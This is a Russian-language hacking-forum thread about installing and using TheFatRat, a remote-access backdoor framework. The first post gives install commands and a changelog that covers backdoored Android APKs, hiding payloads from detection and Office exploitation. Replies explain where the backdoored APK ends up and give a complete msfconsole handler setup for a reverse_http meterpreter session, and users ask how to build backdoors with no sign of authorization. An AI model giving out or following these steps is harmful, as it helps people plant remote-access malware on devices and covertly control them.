Soft The Fat Rat - Backdoor для удаленного доступа V.1.9

Приветствую! Думаю многие из вас слышали об инструменте предназначенном для получения удаленного доступа к целевому хосту под названием The Fat Rat.
В этой статье речь пойдет об обновлении его до версии 1.9.

upload_2017-6-7_23-9-18.png


Приступим к установке, я использую обновленный дистрибутив Kali Linux 2017.1.

> git clone https://github.com/Screetsec/TheFatRat

upload_2017-6-7_23-9-32.png


> cd TheFatRat/

> bash setup.sh

upload_2017-6-7_23-9-49.png


Дожидаемся окончания установки и запускаем TheFatRat из консоли командой:

> fatrat


upload_2017-6-7_23-10-15.png


После проверки необходимых зависимостей, смотрим и внимаем на следующее сообщение:

upload_2017-6-7_23-10-34.png


С этим, я думаю, все понятно, идем дальше жмакнув Enter:

upload_2017-6-7_23-10-46.png


Тут, нас встречает главное меню фреймворка.

Список изменений в новой версии:

· V1.9.4 - Fatrat будет иметь полноценный терминальный режим, добавлен инструмент Powerstage, скрипт установки перестроен.

· V1.9.3 - Добавлен скрипт обновления CHANGELOG.

· V1.9.3 - Dex2Jar будет теперь установлен после установки Fatrat вручную в пользовательской системе (Kali по-прежнему использует старую версию)

· V1.9.3 - Обновлены инструменты для создания Android для V.26 RC1 и платформы Android V. 25-R03.

· V1.9.3 - Обновлен dana travis backdoor-apk до 0.2.2 в fatrat / добавлен openssl в настройке.

· V1.9.2 - Msfvenom Android Rat будет подписан Android - сертификатом, поэтому он может быть установлен правильно.

· V1.9.2 - Реализован по умолчанию LHOST & LPORT config для fatrat & powerfull shell creator.

· V1.9.2 - Реализованные функции Stop в pnwinds.

· V1.9.2 - Новый процесс подписания в старом методе backdoor apk & option для создания listener’a.

· V1.9.2 - Реализована возможность для пользователя сохранять msfconsole listener’s.

· V1.9.2 - Исправления в Microsploit.

· V1.9.2 - Реализован локальный IP-адрес, открытый IP-адрес и имя для powerl.sh

· V1.9.2 - Реализован локальный IP-адрес, открытый IP-адрес и имя хоста перед установкой пользователя LHOST.

· V1.9.2 - Реализовано создание журнала для Microsploit и исправленных ошибок

· V1.9.2 - Добавлен эффективный способ обнаружения пользовательского дистрибутива Linux.

· V1.9.2 - Setup.sh (исправлено).

· V1.9.2 - Удалены некоторые функции и переменные.

· V1.9.1 - v1.9.1 - Реализован Microsploit (Office Exploitation Tool).

· V1.9b - реализован Backdoor-apk от Dana James Traversie в этой версии. {Меньше инструментов для установки во время setup.sh}.

· V1.9.0 - Обновлен скрипт setup.sh.

· V1.9.0 - Исправлены опечатки и ошибки.

· V1.9.0 - Backdoor APKS имеет новый метод скрытия полезной нагрузки в apk Rat, чтобы не быть обнаруженным.

· V1.9.0 - APK (5) rebuild Rat полностью изменилось (адаптированный скрипт backdoor-apk для fatrat).

· V1.9.0 - Apktool больше устанавливается с помощью setup.sh, то же самое относится к: dx, zipalign (apktool на debian repo - 2.2.1, и эта версия дает ошибку при компиляции apk-файлов, поэтому обновлены инструменты apktool и android).

· V1.9.2 - Исправлена полезная нагрузка в опции pnwinds2.

На этом, пожалуй, все. Напоследок, хочу сказать, что он (TheFatRat) стал гораздо круче, жду Ваши статьи с примерами применения этого фреймворка.

Спасибо за внимание.

upload_2017-6-7_23-11-15.png
 
Последнее редактирование:

mz111

Green Team
20.08.2017
77
73
BIT
0
А где найти сгенерированный файл? Я встраивал бэкдор в апк файл , все завершилось успешно и после этого где можно найти сгенерированный файл?

TheFatRat/backdoored
 
Последнее редактирование:
3

3SMTP3

хм.... странно но на писанно тип 1.9.5
Но у меня при установке (примерно месяц назад, разу запилилась 1.9.6
 

Kukocki

New member
20.02.2019
3
0
BIT
0
Подскажите как слушателя запустить?
И еще такой момент, на виртуалке открывается powershell аж 3 штуки и где то через минуту вырубаются, в чем может быть дело? винда 7
 
3

3SMTP3

Подскажите как слушателя запустить?
И еще такой момент, на виртуалке открывается powershell аж 3 штуки и где то через минуту вырубаются, в чем может быть дело? винда 7
Ну он вкл при создание, например

Код:
msfconsole
use exploit multi/handler
set lhost 192.168.0.16 (Ну локала или публичный)
set lport 454 (проброшенный порт или локальный порт)
set payload windows/metepreter/reverse_http
exploit -j
Всё ты его запустил...
А т что сессии выкидывает, ты делаешь на своём пк? Или тестируешь пк друга?
Ну ты скринов наделай и мне в лс отпишись.
 

busuzima

Green Team
22.02.2019
41
16
BIT
0
Приветствую всех! Вопрос не совсем по теме, но заметил один момент именно в этой теме, поэтому пишу сюда.
Ниже на скрине представлена скрытая для гостей ссылка на TheFatRat на гитхабе (стрелочка номер один).
29392

Но следом автор прикладывает скрин команды скачивания тулзы и там ссылка видна и гостям и вошедшим пользователям. Так вот, нужно ли полностью прятать ссылку от гостей и замазывать ее на скрине или же можно было указать ее открытым текстом?

P. S. Vander'у безусловно выражаю свою благодарность и уважение! Люблю вас, Codeby =)
 
  • Нравится
Реакции: Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Приветствую всех! Вопрос не совсем по теме, но заметил один момент именно в этой теме, поэтому пишу сюда.
Ниже на скрине представлена скрытая для гостей ссылка на TheFatRat на гитхабе (стрелочка номер один).
Посмотреть вложение 29392
Но следом автор прикладывает скрин команды скачивания тулзы и там ссылка видна и гостям и вошедшим пользователям. Так вот, нужно ли полностью прятать ссылку от гостей и замазывать ее на скрине или же можно было указать ее открытым текстом?

P. S. Vander'у безусловно выражаю свою благодарность и уважение! Люблю вас, Codeby =)
+ за внимательность :)

Ссылки для гостей недоступны, а скрины, ну пусть будут.
 
  • Нравится
Реакции: Сергей Попов

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
Актуальность думаю, её и нет.) Но тем кому лень писать стандартные команды в msfvenom? Идеально подходит.
не скажи, в веноме можно такого на генерить! Он актуален будет всегда, главное знать что генерить и счем это все мешать!))
Метасплойт - ван-лав! ну и кобальт "красаучык!!"
 

Zer0must2b

Green Team
23.06.2019
306
140
BIT
0
а как подписан установленый пейлоад apk в android системе,имею ввиду com.android и тд.
может кто знает?
 
  • Нравится
Реакции: DarkDepth

DarkDepth

Green Team
17.02.2019
79
20
BIT
0
Апк надо установить,или ещё потом и запустить?
Да.
Нужно запустить. А в com...
Пару минут найду...

а как подписан установленый пейлоад apk в android системе,имею ввиду com.android и тд.
может кто знает?
1576684115898.png

com.metasploit.stage
Поставишь луйс за помощь?
 
  • Нравится
Реакции: Zer0must2b

Huracan2020

New member
20.02.2020
4
0
BIT
0
Парни привет! Вот версию 1.9.7 поставил,а там графического нет,как быть?я не особо разбираюсь(Выдаёт окончание загрузки и строку дальше писать,а что писать?как создать бэкдор например??вот что на терминале:
Instalation completed , To execute fatrat write anywhere in your terminal (fatrat)
root@kali-pc:/home/huracan/TheFatRat# ---- а дальше что писать?Не пойму.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!